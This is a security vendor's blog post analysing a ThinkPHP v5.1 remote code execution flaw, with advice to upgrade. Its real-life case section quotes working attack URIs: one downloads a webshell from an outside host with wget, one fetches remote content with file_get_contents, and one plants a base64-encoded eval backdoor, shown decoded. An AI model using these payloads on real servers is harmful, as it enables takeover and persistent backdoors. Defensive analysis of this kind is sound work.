Alibaba Cloud Discovers the Latest ThinkPHP v5 Vulnerability

By Yong Chen

The exploitation of software vulnerabilities is one of the initial steps of a cyber-attack. In engineering schools, they teach you that fixing a defect in the implementation stage is 6.5 times higher than fixing it in the design stage1. Applying this principle to ‘cybersecurity school’, we can say that blocking an attack at the vulnerability stage is a dozen times cheaper than stopping it after a device is compromised by an exploit.

In this blog post we present an analysis of a recently detected vulnerability in the ThinkPHP framework, which exposed 10% of all websites using it to remote takeover. The post provides a detailed explanation of an actual code used by an attacker in an attempt to exploit this vulnerability, as well as precise recommendations of how to protect against it (hint: apply the official fix! otherwise, get help from Alibaba Cloud’s Threat Detection Service).

Yohai Einav

Principal Security Researcher, SIL

Background

While an official fix for this critical vulnerability was released on December 10th, 2018, Alibaba Cloud Threat Detection Service (TDS), formerly known as Situational Awareness Service (SAS), has still detected multiple attacks exploiting the vulnerability after the fix. In order to ensure that even users that do not update their systems in a timely manner in the cloud are protected from the vulnerability, Alibaba Cloud TDS offers an Attack Alarm service, which uses its web application firewall (WAF) to synchronously block the vulnerability, and protect all customers from it.

The following provides a comprehensive analysis of the vulnerability’s context, logic and behavior, along with a real-life case analysis.

Vulnerability Analysis

Versions Affected by the Vulnerability

ThinkPHP v5.1 versions earlier than 5.1.31

How the Vulnerability Works

The “parseUrlPath” function calls the path function and parses the routing information in “pathinfo”. The URL in the function is divided by slashes (/) without applying any filter.

After searching for “pathinfo”, we find that //thinkphp/library/think/Request.phpdefines the "pathinfo" function which gets the URL.

An attacker can exploit the value of “$_GET” for command injection: the parameter of “var_pathinfo” is “s”, where the function for command injection can be created.

We also analyzed the app.php code for route scheduling, which operates the controller through the “controller” variable, instantiates the controller, and tracks the controller method.

In //thinkphp/library/think/Loader.php, the controller calls "parseModuleAndClass" to parse "$name" and instantiate "$class". When "$name" matches with a backslash (\), it is used as a method and class in "strpos($name, '\')". An attacker can construct and instantiate any method to be called, and instantiate the "namespaceclass" class to execute the "call_user_func_array" method.

Vulnerability Reproduction

Real-Life Case of a Vulnerability Attack

The following is a summary of all existing web shell methods and single out the following popular methods:

1. Exploit the vulnerability, remotely run download commands.

  1. An attacker remotely downloads a webshell backdoor through wget and run the command to get the server permissions.
  2. The constructed attack URI: “/admin.php?s=admin/thinkapp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget+-O+help.php+http%3a%2f%2ftzrj.host.smartgslb.com%2fhelp.php.txt “
  3. Webshell is downloaded by running the command “wget -O help.php http://tzrj.host.smartgslb.com/help.php.txt".

The following screenshot shows the functions list of this webshell:

2. Download webshell remotely by using the file_get_contents and file_put_contents functions.

  1. The constructed attack URI: “/?s=admin/thinkapp/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=file_put_contents(‘content.php’,file_get_contents(‘http://jzy1115.host3v.vip'));"

The following screenshot shows the functions of the webshell:

3. Put a one-liner webshell by using the file_put_contents function.

  1. The constructed attack URI (base64 encoded to avoid detection): “/admin.php?s=admin/thinkapp/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=file_put_contents(‘./vendor/autoclass.php’,base64_decode(‘PD9waHAgJHBhc3M9JF9QT1NUWyczNjB2ZXJ5J107ZXZhbCgkcGFzcyk7Pz4=’))”
  2. The string is decoded as follows:”<? php $pass=$_POST[‘360very’];eval($pass);? >”
  3. The malicious code is written to “./vendor/autoclass.php”.

Vulnerability’s Impact and Attack Trends

The graph above shows the sharp increase in the number of attacked websites, indicating that the vulnerability is automatically exploited at a large scale soon after being exposed.

Based on the team’s previous experience with exploitation of vulnerabilities, we believe that this vulnerability may be exploited in a variety of additional ways. It is therefore recommended that all enterprises upgrade their ThinkPHP framework to the latest version as soon as possible to protect their websites against attacks and prevent their servers being compromised.

Security Recommendations

For more information about this vulnerability, see https://blog.thinkphp.cn/869075.

Reference

Reference:https://www.alibabacloud.com/blog/alibaba-cloud-discovers-the-latest-thinkphp-v5-vulnerability_594307?spm=a2c41.12450928.0.0

Follow me to keep abreast with the latest technology news, industry insights, and developer trends.